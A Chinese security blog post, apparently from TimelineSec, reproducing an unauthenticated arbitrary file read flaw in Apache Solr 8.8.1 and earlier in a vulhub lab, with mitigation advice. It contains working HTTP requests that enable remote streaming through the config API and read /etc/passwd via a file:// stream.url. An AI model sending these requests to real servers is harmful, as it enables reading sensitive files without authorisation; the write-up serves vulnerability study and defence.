专栏名称: TimelineSec
安全圈必备公众号之一!专注于最新漏洞复现!内含漏洞时间线工具靶场等干货!记录每一个漏洞,捕捉安全的每一瞬间!
目录
相关文章推荐
每日经济新闻  ·  优惠结束,DeepSeek涨价! ·  昨天  
木木说卡  ·  2025年申卡指南! ·  4 天前  
澳門政府消費者委員會  ·  【供參考】嬰兒奶粉非處方成藥3項專項物價調查 ·  3 天前  
澳門政府消費者委員會  ·  【供參考】嬰兒奶粉非處方成藥3項專項物價調查 ·  3 天前  
常州日报  ·  -6℃,有严重冰冻!常州开启“速冻模式” ·  3 天前  
常州日报  ·  -6℃,有严重冰冻!常州开启“速冻模式” ·  3 天前  
51好读  ›  专栏  ›  TimelineSec

Apache Solr <= 8.8.1任意文件读取漏洞复现

TimelineSec  · 公众号  ·  · 2021-04-07 21:10

正文


上方蓝色字体关注我们,一起学安全!
作者: 口算md5 @Timeline Sec
本文字数:570
阅读时长:2~3min
声明:请勿用作违法用途,否则后果自负


0x01 简介


Apache Solr 是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。


0x02 漏洞概述


Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。


0x03 影响版本


Apache Solr <= 8.8.1


0x04 环境搭建


使用vulhub快速搭建

wget https://github.com/vulhub/vulhub/blob/master/solr/CVE-2019-17558/docker-compose.ymldocker-compose up -ddocker ps




0x05 漏洞复现


1、获取core的信息:主要是name


http://xx.xx.xx.xx:8983/solr/admin/cores?indexInfo=false&wt=json




2、根据name构造获取config的包


根据返回包内容可判断存在漏洞




POST /solr/demo/config HTTP/1.1Host: 127.0.0.1:8983Content-Length: 80Connection: close {"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}


3、构造读取/etc/passwd的包


POST /solr/demo/./debug/dump?param=ContentStreams HTTP/1.1Host: 127.0.0.1:8983Content-Length: 29Content-Type: application/x-www-form-urlencodedConnection: close stream.url=file:///etc/passwd


0x06 修复方式


将Solr 端口仅对内网开放

无修复版本(好像是官方不认这个漏洞,拒绝修复)


参考链接:






请到「今天看啥」查看全文